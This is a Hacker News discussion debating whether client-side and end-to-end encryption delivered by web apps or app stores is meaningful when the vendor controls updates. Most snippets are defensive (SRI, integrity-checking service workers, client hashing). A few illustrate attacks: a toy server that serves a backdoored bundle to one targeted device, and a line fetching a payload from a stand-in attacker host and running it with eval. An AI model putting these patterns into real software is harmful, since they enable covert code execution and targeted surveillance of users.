Web-based cryptography is snake oil (devever.net)
111 points by hlandau 782 days ago | 102 comments
p-e-w 782 days ago [-]
Not again. We had this same bad argument just last week[1].

Custom-engineering backdoored client software, and rolling it out to a subset of users in a targeted attack, is not comparable to storing everything in plaintext on the server and looking through it whenever the fancy strikes. Practicality matters a great deal in information security.

Yes, it is perfectly possible to do the former – just like it is possible to enter any home and simply bug all hardware inside. That doesn't mean this scenario should be part of a normal person's threat model.

The article is correct in the sense that technically, web-based cryptography requires a degree of trust in the server provider. But the article is utterly wrong in concluding that this makes it snake oil, because attacks are substantially more difficult and costly.

[1] https://news.ycombinator.com/item?id=36386884

samwillis 782 days ago [-]
Exactly, with all cryptographic software you are trusting the distribution and update provider, along with your OS. There is always a level of trust.

With an app from an App Store you are trusting at a minimum:

- the vendor

- the App Store

- the update system for your OS

For a web app (via SSL) you are trusting:

- the vendor

- the browser and its update system

- the OS and its update system

There is barely a difference in a world of auto-updating software.

kpdemetriou 782 days ago [-]
The web app case is unfortunately more hazardous:

- You're also trusting a large population of Certificate Authorities (CAs), with Certificate Transparency only surfacing a mis-issuance after the fact. Only one CA needs to be compromised.

- An app "update" occurs on every page load, giving attackers flexibility and more frequent opportunity to intercept app payloads - perhaps as users cross into networks the attackers control.

- There are currently no sufficient mechanisms to validate the integrity of web app packages end-to-end. Not even under a trust-on-first-use (TOFU) model.

These are all practical constraints we're grappling with while working on Backbone[1], and why deploying native apps is a top priority for us. Nevertheless, we need to reach users where they are, and that means we can't completely deprecate our web app.

[1] https://backbone.dev/

CJefferson 782 days ago [-]
Once a CA gives out one bad certificate, they are done. If your risk profile includes someone being willing to throw away an entire CA to get to you, then you should worry about it. For 99.999% of people and companies, I don’t imagine that is a reasonable concern.
est31 781 days ago [-]
CAs give out bad certificates all the time. Whether they are done depends on the reason. Often people give fraudulent information to CAs, which leads to them issuing a certificate. This is usually discovered soon after the fraudulent issuance, but for some victims it might still be too late. If the CA proves that it followed due diligence, and this happens rarely enough, they won't be distrusted by browsers.
littlestymaar 782 days ago [-]
> - You're also trusting a large population of Certificate Authorities (CAs), with Certificate Transparency only surfacing a mis-issuance after the fact. Only one CA needs to be compromised.

I fail to see the difference between Web and Native in that regard; in both cases the attacker needs both:

- a compromised certificate

- a way to redirect the user to their own server (be it DNS or IP spoofing, or something more fancy like bitsquatting).

With only one of those, both the web and the native app are safe; with both of them, you're screwed in either case.

> - There are currently no sufficient mechanisms to validate the integrity of web app packages end-to-end. Not even under a trust-on-first-use (TOFU) model.

Would you mind expanding on your requirements here? (In particular, what threat model do you have in mind for which subresource integrity isn't enough, but your ideal solution would be?)
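For context, SRI today pins individual subresources by hash; a minimal sketch of computing an integrity value in the browser, assuming a hypothetical /app.js bundle:

    // compute the SRI value the page author would put in
    // <script src="/app.js" integrity="sha384-...">
    const buf = await (await fetch('/app.js')).arrayBuffer();
    const digest = await crypto.subtle.digest('SHA-384', buf);
    console.log('sha384-' + btoa(String.fromCharCode(...new Uint8Array(digest))));

What SRI doesn't pin is the top-level HTML that carries the integrity attributes, which is presumably where the gap lies.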

afiori 782 days ago [-]
I suspect they want a browser feature to show fingerprints of the HTML and of subresources possibly to pin a certificate for a given domain.

A browser setting to only load subresources with integrity checks would also help

littlestymaar 781 days ago [-]
> I suspect they want a browser feature to show fingerprints of the HTML and of subresources possibly to pin a certificate for a given domain.

You can do pretty much anything you want in a ServiceWorker today[1], but I'd advise against pinning certificates, because you'd just be re-making HPKP, with the same gigantic footgun.
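To give a flavour of the ServiceWorker approach, here is a toy fetch handler that only admits subresources whose hashes appear in a manifest baked into the worker (the paths and hash values are invented for illustration):

    // sw.js: toy integrity-enforcing service worker
    const PINNED = { '/app.js': 'q1EYdyTb...' };  // path -> expected SHA-256 (base64)

    async function sha256b64(buf) {
      const d = await crypto.subtle.digest('SHA-256', buf);
      return btoa(String.fromCharCode(...new Uint8Array(d)));
    }

    self.addEventListener('fetch', (event) => {
      const path = new URL(event.request.url).pathname;
      if (!(path in PINNED)) return;  // unpinned resources pass through untouched
      event.respondWith((async () => {
        const res = await fetch(event.request);
        const body = await res.arrayBuffer();
        if (await sha256b64(body) !== PINNED[path]) {
          return new Response('integrity check failed', { status: 502 });
        }
        return new Response(body, { headers: res.headers });
      })());
    });

The obvious catch is that the worker itself is delivered by the same origin it polices, so this raises the bar rather than removing the trust.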

> A browser setting to only load subresources with integrity checks would also help

A “browser setting”? What's the point if the user needs to set it up themselves to be secure? Some kind of linting tool in CI to be sure you never include a resource without SRI would be nice, but it's not really the responsibility of the browser here.

[1]: you can see an example of that here: https://arxiv.org/pdf/2105.05551.pdf (Note that I've just DuckduckGo-ed a quick example, I haven't read this particular paper and can't say if their scheme is particularly good, but that'd give you an idea).

est31 781 days ago [-]
The difference is, with the App Store there are policies against malware. Furthermore, it's harder to hide such an attack, as you can't press a button to deploy a special version of the client just to Joe Doe whose private pictures you are interested in. You either have to deploy it to a large group, or not at all. With JS, you have full control over the HTTP server and can give that specific person a specific version of the client.

Yes, the updates are automated on mobile devices, but not under total and full control of the app developer, unlike for websites.

And people do monitor what e.g. the Signal app is doing, or WhatsApp.

I don't agree, though, that all web-based cryptography is snake oil. Targeted attacks from the site operator are not the only thing you want to defend against. Say the site operator is asked by authorities to hand over data they store for a specific user. Then even the insecure web-based cryptography is enough to protect the data: everything that's stored is encrypted.

SheinhardtWigCo 782 days ago [-]
I somewhat share this fatalist view, but it's still worth iterating on all of this until it's possible for the trusted party to be the user's chosen auditor instead of the vendor.

Unfortunately, the vendors have little reason to facilitate that.

goodpoint 782 days ago [-]
If you use a security-oriented Linux distribution there will be a ton of difference.
anonym29 782 days ago [-]
This line of thinking is analogous to handing competent threat actors a skeleton key to your system with only one condition: as long as the attack is not trivial, you'll grant them full access.

These kinds of attacks can be made trivial with the engineering capability, capacity, and systems employed by large tech firms like Google, Apple, Facebook, et al., even in their role as third-party platform providers, to say nothing of their own first-party software.

These systems can already classify your political views with a high degree of accuracy, and platforms like the iTunes / Apple App Store and Google Play are already designed with the capability to serve different versions of applications to different requestors (think beta programs), in addition to being the signing entity for package formats that they are entirely capable of supplementing with additional code.

To be clear - it's entirely plausible that one day, the rogue, evil, mean government voted into power by the evil bad party of your choice could compel Apple, or Google, to backdoor all applications going to clients with the same known political views as yours.

You believe this to be too complex or unrealistic to be plausible (Occam's Razor, right?), but in doing so (and lowering your guard to such a threat), YOU are the one who makes this go from impossible to possible.

Also, using normative framing like "'normal people' shouldn't worry about this in their threat model" implies that those who do have competent threat actors after them aren't "normal", but we know that to be untrue - competent threat actors are, to some degree or another, after everyone. There is no need to "otherize" people for simply being aware of this.

Instead of prescribing behavior, consider that maybe individuals are better equipped to understand their own threat models than you are, and explain the pros and cons of various courses of action, rather than implying that everyone who isn't a sheep isn't normal, and everyone who is a sheep doesn't have real threat actors interested in them.

phh 782 days ago [-]
I agree it isn't snake oil, but from my PoV it's barely moving the scale back from "use an E2E IM to protect against your state", while either recommending closed-source apps or closed-source origins (downloading an open-source app from the Google Play Store or App Store, which owns the encryption keys, gives pretty much the same security as a closed-source app).
badrabbit 782 days ago [-]
I have to disagree with you: the ability of threat actors and law enforcement (LE) to selectively backdoor code on the server is important in any threat model (TM).

Practicality is dynamic: threat actors (TAs) use the easiest method within the parameters of their objectives. It is reasonable to assume this attack would be the easiest, given a lack of other options.

By your logic, 56-bit DES is fine because most people won't see attackers that spend >$20k to crack their keys. Just like they won't see robbers who spend that much to break into their homes.

Infosec is different from IRL because TAs can attack arbitrary targets easily with little personal risk. Also, hard attacks today can become common attacks a year from now, and security for even the 99th percentile of users who get targeted attacks is important.

fragmede 782 days ago [-]
A jilted jealous former lover dropping a hardware bug in someone's home doesn't really seem that far fetched, but maybe I've been watching too many TV shows. Something off Amazon for < $100 can record audio for hundreds of hours to a microSD card, and it's only active when there's noise.
chromakode 782 days ago [-]
While I agree with this premise, taking an extreme view, practically all software which users routinely update is vulnerable to the first party / author being compelled to ship a harmful release.

The lack of a distribution trust model for the web has long bummed me out, but even snake oil E2EE is a good thing because it makes an active (and potentially detectable) intervention necessary to exploit a client.

Supply chain attacks remain a huge mess. Unless you can validate the worthiness and authenticity of an update, or sandbox it sufficiently, most software can become a threat.

A more manual, opt-in update process for web apps (via service workers) would be a nice innovation, but I doubt it would provide much more safety to non technical end users, since the harder question is whether a particular update is harmful. Solving that verification problem is the crux of the issue regardless of how rapidly software updates.
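The building blocks for the opt-in part already exist; a rough page-side sketch (assuming the worker itself doesn't call skipWaiting() unprompted, and with the message type being a made-up convention):

    // surface new service worker versions instead of silently activating them
    const reg = await navigator.serviceWorker.register('/sw.js');
    reg.addEventListener('updatefound', () => {
      const next = reg.installing;
      next.addEventListener('statechange', () => {
        if (next.state === 'installed' && navigator.serviceWorker.controller) {
          // a new version is downloaded and waiting; ask the user first
          if (confirm('An update is available. Apply it now?')) {
            next.postMessage({ type: 'SKIP_WAITING' });  // worker then calls skipWaiting()
          }
        }
      });
    });

But as said, this only controls when an update lands, not whether it's trustworthy.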

croes 782 days ago [-]
One step further: any software that you didn't compile yourself, from source you've checked, could have a secret trigger to do harm.

And you need to trust the compiler.

bhawks 782 days ago [-]
You trust that CPU doing the build? Have you heard about the mess Intel Management Engine is?

Unless you build from the transistors up you have incoherent security theater.

BasedAnon 782 days ago [-]
Here's a tutorial if you want to actually do this, although it's worth pointing out that quality is heavily dependent on how much you're willing to shell out for equipment: https://www.youtube.com/watch?v=s1MCi7FliVY
rootw0rm 782 days ago [-]
hold on, which universe did you source your matter from?
wolletd 782 days ago [-]
https://www.teamten.com/lawrence/writings/coding-machines/
duck2 782 days ago [-]
Nothing old silicon and analog peripherals can't solve.
Koffiepoeder 782 days ago [-]
Indeed, in the end it all comes down to trust. One of my favourite HN comments of all time is this one:

https://news.ycombinator.com/item?id=33899478

If you want to be 'really' secure, you can trust no one. No silicon, no software, no compilers, no certificates, no power grids, no networks, no friends, no coworkers, no nothing.

But that is no life I'd want to live. So I pick my battles and make sure my SecOps is better than 99.9% of the people out there. For me that suffices. YMMV.

EGreg 782 days ago [-]
https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
NoZebra120vClip 782 days ago [-]
Currently, following the latest updates is a Sophie's choice, because if your software is a month old, it may have one or two known vulnerabilities, which may or may not be disclosed, may or may not have a POC, and may or may not be actively exploited in the wild. But if you download and install the latest update, then you may receive mitigations for known exploits, but now you very likely have an unknown number of new zero-day vulnerabilities.

So update decisions could have a calculus like, "it's already working; I don't need any feature updates; I'll stick with the stable version" and then attempting to evaluate each CVE on its merits vs. the mitigations offered in each update. (Of course, the way developers like KeePassXC are fighting with the NVD shows that CVE descriptions can't even be trusted these days.)

I foolishly disabled automatic updates for my consumer-grade WiFi router, and I didn't have a plan for manual updates, so it got pwned. I read a few CVEs and I'm fairly sure I know how it was pwned remotely. Thankfully it didn't seem to be making lateral moves into my computing devices, or acting against me personally, and I was able to disinfect the router and put it back into service. The vulnerabilities that enabled the pwnage were fixed by an update which was released about a month before the pwnage, so if I'd been on automatic updates, I probably would've been safe. And that's what the hackers count on.

predictabl3 782 days ago [-]
I'm sorry this makes absolutely no sense to me. It feels like a convoluted explanation for being stubborn about auto updates and then an example of precisely why they're useful.

I would take an unaudited, patched-for-known-CVEs build over just not updating, any day.

goodpoint 782 days ago [-]
> Unless you can validate the worthiness and authenticity of an update

That's the job of traditional Linux distros.

> or sandbox it sufficiently

That does nothing when it comes to E2EE.

chromakode 782 days ago [-]
> That's the job of traditional Linux distros.

I share this view, but I also think it's very difficult to verify such validation is happening. I don't think most end users would want a distro stable enough to meet a high review bar.

> That does nothing when it comes to E2EE

Not all components need access to the keys or user data. Reducing attack surface reduces the amount that needs to be validated.

EGreg 782 days ago [-]
Now AI shows just how much malware is in our package managers: https://twitter.com/engageusersai/status/1672872723486310400...
upofadown 782 days ago [-]
If it works out that the first party has to ship a harmful release to everyone and they can only supply that release through a second party in source code form then we are way ahead of the case where there is only one party. A conspiracy involving multiple entities is much harder to get away with than a unilateral action.
skrebbel 782 days ago [-]
Seems the crux is in the auto-updating, right? So now we have security people telling us to always run the latest updates, to protect against 0-days, and security people telling us to not update, because that lets the service spy on us.

It does not seem to me that there is any middle ground, barring writing your own client, from scratch, against an open protocol.

EDIT: seems to me that web-based e2e encryption, as described here, still protects you from irresponsible employees of the service reading your messages. And database leaks etc. Getting an update that spies on customers shipped is not a trivial thing in most organisations.

kpdemetriou 782 days ago [-]
The impact of E2EE in the event of database compromises is a little underrated, because the conversation often centers around the maximalist targeted-surveillance threat model. Yet many more individuals will be affected as a result of plain old data breaches.
NoZebra120vClip 782 days ago [-]
> always run the latest updates, to protect against 0-days

How does running the latest updates protect against 0-days? Wouldn't the latest updates be bundling the latest 0-days? The latest updates mitigate known vulnerabilities, not 0-days.

emersion 782 days ago [-]
Updating is fine as long as it's from an auditable repository with full source code history, and built by a third party like a distro (or the build is reproducible).
skrebbel 782 days ago [-]
Who really reads the source code though?
msla 782 days ago [-]
The idea is that enough people do that if something bad happens, it makes the news, by which I mean Twitter/Mastodon/HN/LWN and so on.
EGreg 782 days ago [-]
By which time we get this:

https://qbix.com/blog

goodpoint 782 days ago [-]
A repository with history is not enough. It's easy to circumvent. You need software packages reviewed and signed by trusted parties - aka a traditional Linux distro.
sashank_1509 782 days ago [-]
This argument doesn’t make sense really. Let us say I send a message on WhatsApp and now the government wants to know what I sent.

The government, using all its coercive power, forces WhatsApp to update everyone's app with compromised code. If I simply refuse to download the update, isn't it impossible for the government to know what I sent?

Let us say I do download the update. I suppose something extremely crude would have to happen for the govt to access my message, like the client reading every message ever sent and uploading them all to the server again. Presumably you would learn of such a breaking update through the news and just refuse to update your software.

If the government forces WhatsApp to permanently use backdoored code in the future, then it’s no longer E2E encrypted.

Purportedly E2E provides some degree of protection against an authority of infinite coercion capability like the government. If we are talking about the government, they could just arrest you, torture you and get access to your messages client-side if they want to. I think E2E encryption is even more helpful when it comes to protection against opportunistic actors like employees of the company offering the messaging service. I can be assured that no employee can ever sell my data, even if they were bribed, and any man-in-the-middle attacks are also rendered pointless.

SheinhardtWigCo 782 days ago [-]
Hypothetically, a government can coerce Apple or Google to update just your WhatsApp in a manner that you can't realistically detect.

To make this more concrete: if Apple or Google has Australian citizens in positions with privileged access to software update infrastructure, the Australian government can issue a Technical Assistance Notice compelling them to cause a compromised variant of an app or OS component to be delivered to a targeted user, and binding them not to disclose the existence of the notice.

UncleMeat 782 days ago [-]
This is a very big hypothetical. The app stores don't have this precise of targeting, so they'd need to build entirely new distribution functionality in addition to the backdoored app.

Given that Google currently leaks like a freaking sieve and has a monorepo where everybody has access to almost all of the code, it is difficult to believe that this plan would go off without a hitch.

SheinhardtWigCo 782 days ago [-]
Certainly a large dose of cynicism is needed to even entertain the possibility. My own cynicism stems from the Snowden disclosures and other leaks.

I think there are more possibilities than you're considering. As far as I know, once a backdoored app is signed with the correct key, there's nothing stopping the partner CDN(s) from serving it to targeted users. In the simplest case, that's about 5 lines of nginx config.
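To make that concrete, here is the same idea as a toy Node server rather than nginx config (the device-ID header and filenames are invented for illustration):

    // toy targeted-serving sketch: one device gets a different bundle
    const http = require('http');
    const fs = require('fs');
    http.createServer((req, res) => {
      const targeted = req.headers['x-device-id'] === 'TARGET-SERIAL-123';
      res.setHeader('Content-Type', 'application/javascript');
      res.end(fs.readFileSync(targeted ? 'app.backdoored.js' : 'app.js'));
    }).listen(8080);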

Also, the ability to stratify OS updates already exists because there are many combinations of country + carrier + device model + user permissions (e.g. special rules allowing internal/external developers and carrier employees to install development builds).

UncleMeat 782 days ago [-]
> As far as I know, once a backdoored app is signed with the correct key, there's nothing stopping the partner CDN(s) from serving it to targeted users.

This is true for native software distributed by various linux distro maintainers too.

rdtsc 781 days ago [-]
> so they'd need to build entirely new distribution functionality in addition to the backdoored app.

In order to do debugging or a slow rollout, I can see them implementing this in their backend. They can target updates at least by some combination of properties. Once that's in place, it might not be hard to throw a unique identifier in there as well.

sneak 782 days ago [-]
> The app stores don't have this precise of targeting

This is false. Apple's OS-level software update tools have had the ability to target specific hardware items (ie serial numbers, ethernet MAC addresses, etc) for well over a decade.

chrismorgan 782 days ago [-]
Minor correction: I believe your case would require a technical capability notice the first time it was done. Assistance notices are “help us with the tools you already have” and regular warrant stuff, whereas capability notices are “you must develop the capability to help us”, and come from the Attorney-General with approval from the Minister for Communications. (A good summary of what this stuff means: https://www.homeaffairs.gov.au/nat-security/files/assistance....)

But I also don’t think that this stuff would actually apply to Apple or Google. It’s part of the Telecommunications Act, for carriers and carriage service providers, which, while broad definitions, probably exclude them. Back when I worked at Fastmail (2017–2020), Fastmail as an email service provider was considered subject to that act for data request purposes, but the footnote at https://www.fastmail.com/blog/advocating-for-privacy-aabill-... indicates that in 2021 they were able to change to using the Crimes Act and such instead, so I’m not sure if they’re even subject to the Telecommunications Act in this way any more (not that the A&A Bill affected them anyway since they don’t do E2EE), and Apple and Google’s app stores feel like they would be even more out of scope. But I don’t know; there’s quite a bit of legislation I’ve paid close attention to, but the Telecommunications Act isn’t among that collection. And even if these app store companies aren’t covered by this stuff now, there are probably other governments out there that can already insist on this sort of thing, and plenty of future prospects, the A&A Bill showing how easily this sort of thing can be shoved through.

SheinhardtWigCo 782 days ago [-]
Thanks for the correction! That subtlety eluded me.

On whether the assistance measures apply: the Home Affairs FAQ you referenced says they apply to "companies, businesses, organisations or individuals who contribute to the communications supply chain in Australia... This definition captures telecommunications operators, providers of electronic services, developers of software and manufacturers of devices."

jdthedisciple 782 days ago [-]
Perfectly said.

And a second-order negative consequence of the type of argument this author is pursuing is that it makes normal privacy-aware folk look completely delusional and paranoid about reality.

The vast majority of people relying on E2EE will not be affected by any of the scenarios he is laying out.

And if they will, it will be the headline of the week (at least on Twitter & Co.) and people will switch. Simple as that.

mind-blight 782 days ago [-]
This seems poorly reasoned. The premise that there's a hard divide between trustworthy and untrustworthy systems is, at best, incomplete.

The author's definition would consider 1Password an incoherent system, yet it's exceptionally effective at mitigating a whole class of attacks. You could argue that any system where you don't control at least 1) the update mechanism, or 2) the keys isn't sufficiently secure. That's one valid approach, but I would recommend anyone who thinks this read Reflections on Trusting Trust: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref....

The more interesting and important problem isn't preventing all possible attacks. It's knowing what attack vectors are worth preventing, and what the consequences for a successful hack are. It's definitely not black and white

upofadown 782 days ago [-]
It is just the end-to-end encryption (or client-side encryption in the case of 1Password) part that is snake oil. If you trust 1Password (or generally the entity that controls the software) then you can consider yourself secure.

The hard divide comes from the truth of who controls your software.

zzzeek 782 days ago [-]
> The problem is, of course, that “there's nothing we can do” isn't true. The service provider could develop and ship a backdoored version of the client software. The actual gambit the service provider is counting on here is a particular legal theory: “we could change the software so as to be able to process this warrant, but you can't make us do so”.

> You could perhaps call this cryptography theatre. The purpose of cryptography theatre is not to deliver actual security from a cryptographic perspective but act as a kind of magic spell which (the user believes) gives them a magic opt out from the obligations conferred by warrants and subpoenas. Thus, cryptography theatre must fundamentally be understood not as a cryptographic technology but as a legal one.

dude drinks too much coffee. Of course I wouldn't trust WhatsApp to not give away my conversations to the NSA. But if I'm using WhatsApp in a Starbucks on their wifi, some script idiot next to me can't read my conversations. Not like I use WhatsApp (or talk to people, really) but the security here is on a spectrum.

chrismorgan 782 days ago [-]
The subject here is end-to-end encryption (where content is encrypted all the way from one client device to another client device), which makes big promises of inviolability. But in order to avoid the Starbucks snooper, you only need transport encryption (where content is encrypted from your client device to the WhatsApp or whatever server, normally with TLS in the form of HTTPS).
zzzeek 782 days ago [-]
Yes, good clarification. Generally, if you're looking for government-proof conversations, I'd never use a Facebook or Google product or anything like that at all. Seems like the best idea would be dedicated devices you prepare with your co-conspirators up front, using only open source components that you've audited and certs you've set up yourselves.
tqwhite 782 days ago [-]
Also, the bad guys could kidnap your children and use them to force you to hand over your password.

The histrionic use of "snake oil" is silly. Only idiots think that secrets are safe under all conditions, viz, the above. The real world meaning of secure is to make it very (very, very) difficult for bad guys to get access to your stuff.

It is neither reasonable nor desirable to have some kind of perfect world where no mistakes can be made to help bad guys get caught. If this can be done with almost zero good guys being compromised, good enough.

Sanctimonious sneering about 'theater' when WhatsApp, Signal and iMessages make practical security available to the masses is, well, sanctimonious. Unpleasant, even.

SheinhardtWigCo 782 days ago [-]
1. The author is correct that the real purpose of E2EE, and the reason companies expend considerable R&D resources on it, is to have a plausible excuse not to produce records; and to protect against malicious insiders. That's it. You don't have real "end-to-end" encryption unless you or someone you really trust has thoroughly audited the hardware and software stack. Obviously, almost no-one has the resources to do that.

2. The author's argument also applies to the App Store distribution model. Apple or Google may choose or be compelled to publish an app or OS update that is only visible to certain users. By default, iOS and Android install app updates without user approval. (You can and should, of course, disable that if you're concerned about such things.) The key difference is that app developers can't mount targeted attacks in this manner; only Apple and Google can.

3. Here's a simpler iteration on the author's idea for applying subresource integrity to service workers: an "immutable" variant of the https scheme that requires the lowest level of the domain to match a hash of all resources loaded on the page. JS is only enabled if the hash matches.

https+immutable://mhzwdnyyv5turofr8kkivabqyvamg7yteeitzwrg64o00taouw.signal.org

As far as I can tell, this mitigates the issues outlined by the author (a sketch of the check follows the list below), and has the following nice properties:

- You can bookmark the URL and be certain that the code can't change in future.

- You can share the URL with someone else and be certain that they will be served the same code.

- Not affected by client-side state (e.g. cache) and thus can't be abused for fingerprinting.

- No risk of bricking the app in perpetuity.

- Thanks to Certificate Transparency, the existence of any published update is public knowledge.
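A sketch of the check a browser might perform (hypothetical; the label encoding is hand-waved as lowercase hex here):

    // hypothetical enforcement for https+immutable://<hash-label>.signal.org
    async function checkImmutableOrigin(hostname, resourceBuffers) {
      const expected = hostname.split('.')[0];  // the lowest-level label
      const digest = await crypto.subtle.digest(
        'SHA-256',
        await new Blob(resourceBuffers).arrayBuffer());  // all resources, in load order
      const actual = [...new Uint8Array(digest)]
        .map((b) => b.toString(16).padStart(2, '0')).join('');
      return actual === expected;  // JS would only be enabled on a match
    }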

ryan-c 782 days ago [-]
> The author's argument also applies to the App Store distribution model.

This is explicitly called out.

SheinhardtWigCo 782 days ago [-]
Oops, good point, I missed that.
snowstormsun 782 days ago [-]
3. Nice idea! But how will that prevent any pinned script from loading new code by making some request to the server of Eve (a simple GET request, for example) and running it using something like `eval`? The problem is that the pinned scripts would need to be thoroughly audited, which is hard to do for non-open-source compiled/minified Javascript.
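i.e. the pinned bytes stay identical while the behaviour doesn't (eve.example standing in for an attacker's host):

    // a hash-pinned script can still bootstrap code no integrity check ever saw
    const payload = await (await fetch('https://eve.example/payload.js')).text();
    eval(payload);

(A strict CSP without 'unsafe-eval' closes the eval route specifically, but not, say, exfiltration via fetch.)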
SheinhardtWigCo 782 days ago [-]
True, but that problem applies to "native" apps as well.
kpdemetriou 782 days ago [-]
Regarding #3, you'll need to load the immutable URL, perhaps indirectly, from someplace that ultimately has a user-facing URL. If an attacker can modify content in transit, then they can modify the content under the user-facing URL to bypass this scheme.
SheinhardtWigCo 782 days ago [-]
The idea is that the immutable URL serves the entire app. Then if your threat model calls for it, you can bookmark the URL to "pin" that version of the app, or send the URL to someone else and be sure that they're getting served with the same code as you. Sort of like an onion URL.
Aachen 782 days ago [-]
Web-based cryptography saved my ass fifteen years ago, when HTTPS wasn't even used for the site I logged into.

Then how can you trust what the server sends you at all?! Infinitely worse than the situation described in the article!

My attacker must have been someone on the school network. They deleted a lot of things (it was purely destructive), but I saw in the access logs that they were stumped by the admin panel, which asked for the password again. I had entered my password, of course, but the login form had client-side hashing. They could take my session token, but my password was safe. I used the password in other places as well, I think even for my email, because I wanted both to be secure and it was a good password (my logic as a 16-year-old), but it was never compromised.

I did change it in case they could brute force the hash at some point (small chance), but client-side hashing saved my ass from passive observers. Later, I was a passive observer myself with airmon-ng, exploring public WiFis (no malicious intent, though). Writing and injecting custom data into the traffic was beyond my skill level, as it seemed to have been for those schoolmates.

TLS makes a lot of things better, but on the need-to-know principle, I still feel like client-side password hashing has merit. The server never needs to know your password; it just needs to do a quick single round with a secret pepper to disallow a pass-the-hash attack.
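A minimal sketch of that split with today's WebCrypto (the iteration count and parameters are illustrative only):

    // client: derive a verifier from the password; the password itself never leaves
    async function clientHash(password, salt) {
      const key = await crypto.subtle.importKey(
        'raw', new TextEncoder().encode(password), 'PBKDF2', false, ['deriveBits']);
      const bits = await crypto.subtle.deriveBits(
        { name: 'PBKDF2', hash: 'SHA-256', salt, iterations: 600000 }, key, 256);
      return new Uint8Array(bits);  // send this instead of the password
    }
    // server side (conceptually): store HMAC(pepper, clientHash), so a leaked
    // database can't be replayed as login credentials (the pass-the-hash concern)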

chrismorgan 782 days ago [-]
I’ve taken to using the phrasing “first-party end-to-end encryption is snake oil”, which I feel is also incidentally a slightly more accurate take on the content of the article than the article’s own title, though both are generally true, drawing on different aspects, and both lack a little nuance.

(I first used that specific phrasing a bit over a year ago, judging by HN search.)

A large part of why I call it snake oil is that it’s generally being sold as an inherent and unassailable virtue, when in actual fact it’s nowhere near as perfect as practitioners of it try to convince you (and most of their marketing claims are flat lies, though some do word things more precisely), and you make significant compromises in usability and functionality, which they don’t tell you about. From a convenience perspective, end-to-end encryption is simply dreadful and that’s all there is to it.

I wish we’d ended up with everyone hosting their own stuff instead, with completely decentralised infrastructure, which obviates extra end-to-end encryption (since transport plus storage encryption achieves just as much, and far more conveniently). But we haven’t, and there’s no realistic hope of ever ending up there with how we use tech now—it wouldn’t be particularly practical.

canes123456 782 days ago [-]
This comment is kind of baffling to me. I agree that first-party end-to-end encryption is not a silver bullet and it is oversold. But in use cases where it makes sense, like messaging, it is a virtue and absolutely is worth the convenience/security trade-offs.

Yes, the first party can secretly undermine the end-to-end encryption for a single customer without alerting the customer. However, this would be exceedingly hard to do for an attacker (insider or outsider) compared to there being no end-to-end encryption. You would need to have the first party on board with this, which would be very illegal unless directed by a government. So you might still be vulnerable to state-level attacks, but the company might be able to resist them by pointing to the end-to-end security, versus encryption by itself. It is still strictly better than no end-to-end security, where the government will request everything that was ever sent.

What is most odd is that you say that end-to-end encryption is not worth the convenience trade-off, but you think everyone hosting their own stuff would be better? This would be a disaster for both convenience and security. There is zero chance that 99% of users would be able to securely self-host their data. Even for the 1% that can and will secure their data, their data is likely also hosted by the other 99%. You just need to exploit the other side of the conversation and you are still screwed.

chrismorgan 782 days ago [-]
You’re underestimating the costs of E2EE even in messaging. There are plenty more that cause trouble (e.g. lack of recoverability, no content-based spam filtering, various key sharing problems), but I’ll focus on one that’s probably the easiest cost to talk about: no server-side search. If you want useful search, you have to download the entire collection, and be bound by your client’s performance. (In theory you can just download/store/upload an index, but in practice I gather that isn’t workable and doesn’t help anything.) This is generally tolerable for something like iMessages which is designed to be used on one or a very few physical devices where it’s persistently stored, but is very impractical for things like web access and larger collections, things like email. By most people’s threat models, E2EE for email is a terrible idea.
WhatsName 782 days ago [-]
Like everything, it comes down to trust. I fail to see how shipping Javascript to a browser should be treated any differently than code shipped to a phone or your desktop. Yes, the frequency of updates is different, but other than that, if you can't trust the entity that sends you the code that you run, you are out of luck.
piaste 782 days ago [-]
It's not the frequency of updates, it's the control. I can easily ignore an application update until any arbitrary standards I require are satisfied; whether those standards are "ok, 48 hours have passed with no security alerts" or "my company's professional auditors have reviewed all code changes" is up to me.

(Unless there's a breaking change on the server side, but precisely because app updates are not guaranteed, app backends are much more conservative than web backends).

Controlling the updates for a web client might not be totally impossible, but it's far, far more difficult and clumsy. Best case, it's a full SPA so you can just save the resources locally; worst case, it's classic server-side rendering with just a single chunk of client-side JS used for encryption... And of course there are no clearly announced and numbered releases; you need to keep refreshing the page to know when an update is deployed.

MattPalmer1086 782 days ago [-]
It's much easier to update or hack a web site than it is to distribute a new signed version of your code via app stores.

On your web site, you could easily serve up different pages to different users. I think you'd have to distribute compromised copies of your app to everyone with an app store?

Or is there any evidence that app stores can deliver different versions for specific users?

FabHK 782 days ago [-]
And the article says as much:

> It is worth noting that this law also applies to non-web applications where the service provider supposedly being secured against is also the client software distributor; thus, the “end-to-end encryption” offered by Whatsapp and Signal, amongst other proprietary services, is equally bogus.

jdthedisciple 782 days ago [-]
One fault of this argument lies in the assertion that every E2EE app auto-updates.

IOW, if you decide to stick with one version that is shown to be without a doubt E2EE, then certainly you are better off than with just TLS.

Furthermore, this article only focuses on in-transit encryption (TLS). What about encryption at rest? It can perfectly well be viable to have an E2EE service provider keep my data stored in zero-knowledge fashion.

Lastly, an E2EE service provider's reputation and business typically rest on keeping their word. There is not a whole lot of incentive to break it, given that the jurisdiction they reside in allows them to refuse compliance with secret services.

IMO this is fear-mongering. At the very least, equating even this supposed "snake oil" E2EE with mere TLS seems out of touch with reality.

I wonder if the author himself avoids E2EE messaging services too.

anticristi 782 days ago [-]
Related snake oils:

- Customer-Managed Encryption Keys -- US cloud providers love to market this

- Confidential Computing -- where the root of trust is either the same company (AWS) or a US processor manufacturer (Azure, Google).

MattPalmer1086 782 days ago [-]
I think customer-managed keys are often misunderstood. They aren't innately more secure than cloud-provider-managed keys. They just give the customer the ability to manage the key lifecycle: key generation, rotation, revocation. This is still a useful capability.
anticristi 782 days ago [-]
Indeed. I'm unsure whether this misunderstanding is "nurtured" or is simply "wishful thinking". Unfortunately, I heard too often CMEK being seen as "the holy grail" of processing data safely on untrusted cloud providers.
MattPalmer1086 782 days ago [-]
Yes, I encounter that attitude too quite frequently.

If you need to manage the keys according to particular schedules or policies, it's obviously what you want. That might be more secure in some ways than leaving it to the cloud provider, depending on what you actually do with the capability. But many people just stop at "CMEK Is More Secure"...

ketzu 782 days ago [-]
